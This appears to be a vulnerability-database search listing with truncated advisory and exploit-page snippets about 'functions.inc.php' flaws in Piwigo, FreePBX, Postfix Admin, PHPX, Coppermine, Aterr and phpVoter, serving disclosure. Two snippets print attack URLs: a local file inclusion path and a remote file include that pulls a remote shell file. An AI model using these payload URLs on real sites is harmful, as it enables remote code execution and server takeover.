EUVD-2005-0889

Malware in sbrugna...

EUVD-2021-32130

Malicious code in bioql PyPI...

CVE-2021-45357

Cross Site Scripting XSS vulnerability exists in Piwigo 12.x via the pwgactivity function in include/functions.inc.php...

CVE-2021-45357

Cross Site Scripting XSS vulnerability exists in Piwigo 12.x via the pwgactivity function in include/functions.inc.php...

CVE-2021-45357

CVE-2021-45357 describes a cross-site scripting (XSS) vulnerability in Piwigo 12.x exploitable via the pwg_activity function in include/functions.inc.php. Public records in the connected sources confirm the vulnerable component and location, with related OpenVAS entry noting “Piwigo

FreePBX 'functions.inc.php' file remote code execution vulnerability

FreePBX is an Asterisk Dynamic IPPBX package developed using Linux, Apache, MySQL and PHP technologies. The functions.inc.php file in FreePBX has unfiltered parameters that are spliced directly into exec, which can be exploited to cause remote command execution...

FreePBX 13.0.35 remote code execution

A vulnerability overview 1. Vulnerability description FreePBX is called the Asterisk Management Portal, IP telephony tools Asterisk standardized implementation that provides a Web configuration interface and other workers FreePBX in functions.inc.php file exists for the parameters without...

FreePBX 13.0.35 - Remote Command Execution

Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan 0x4148 Email : [email protected] Summary : FreePBX is a web-based open source GUI graphical user interface that controls and manages Asterisk PBX, an open source communication server, With over 1...

FreePBX 13.0.35 - Remote Command Execution

FreePBX 13.0.35 - Remote Command Execution Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan 0x4148 Email : [email protected] Summary : FreePBX is a web-based open source GUI graphical user interface that controls and manages Asterisk PBX, an open...

FreePBX 13.0.35 Remote Code Execution

Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan 0x4148 Email : [email protected] Summary : FreePBX is a web-based open source GUI graphical user interface that controls and manages Asterisk PBX, an open source communication server, With over 1...

Sql injection

SQL injection vulnerability in the genshowstatus function in functions.inc.php in Postfix Admin aka postfixadmin before 2.3.7 allows remote authenticated users to execute arbitrary SQL commands via a new alias...

CVE-2014-2655

CVE-2014-2655 : SQL injection in Postfix Admin (postfixadmin) via the gen_show_status function in functions.inc.php, exploitable before 2.3.7 when creating a new alias. Affected: Postfix Admin, prior to 2.3.7. Root cause: improper SQL handling in list-virtual.py? (per sources) and related advisor...

CVE-2014-2655

SQL injection vulnerability in the genshowstatus function in functions.inc.php in Postfix Admin aka postfixadmin before 2.3.7 allows remote authenticated users to execute arbitrary SQL commands via a new alias...

CVE-2008-3489

SQL injection vulnerability in checkCookie function in includes/functions.inc.php in PHPX 3.5.16 allows remote attackers to execute arbitrary SQL commands via a PXL cookie...

Directory traversal

Directory traversal vulnerability in the usergetprofile function in include/functions.inc.php in Coppermine Photo Gallery CPG 1.4.18 and earlier, when the charset is utf-8, allows remote attackers to include and execute arbitrary local files via a .. dot dot in the lang part of serialized data in...

Coppermine Photo Gallery 1.4.18 - Local File Inclusion Remote Code Execution

Coppermine Photo Gallery 1.4.18 - Local File Inclusion Remote Code Execution authenticate; ... 301. // Process language selection if present in URI or in user profile or try 302. // autodetection if default charset is utf-8 303. if !empty$GET'lang' 304. 305. $USER'lang' = ereg"^a-z0-9-$",...

Aterr 0.9.1 (class) Local File Inclusion Vulnerabilities (php5)

Exploit for unknown platform in category web applications =============================================================== Aterr 0.9.1 class Local File Inclusion Vulnerabilities php5 =============================================================== Atter 0.9.1 Local File Inclusion Vulnerability Auth...

Aterr 0.9.1 - PHP5 Local File Inclusion

Atter 0.9.1 Local File Inclusion Vulnerability Author : KnocKout ThanX : CW ALL USERS ================================================= Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5 Attackz : http://localsite.com/path/include/functions.inc.php?class=Local File...

phpvoter-rfi.txt

phpVoter v0.6 Remote File Include Vulnerability ilker kandemir Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-06.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Exploit: includes/functions.inc.php?sitepath=http://shell.txt?...

phpVoter v0.6 Remote File Include Vulnerability

phpVoter v0.6 Remote File Include Vulnerability ilker kandemir ilkerkandemiratmynet.com Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-06.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Exploit: includes/functions.inc.php?sitepath=http://shell.txt?...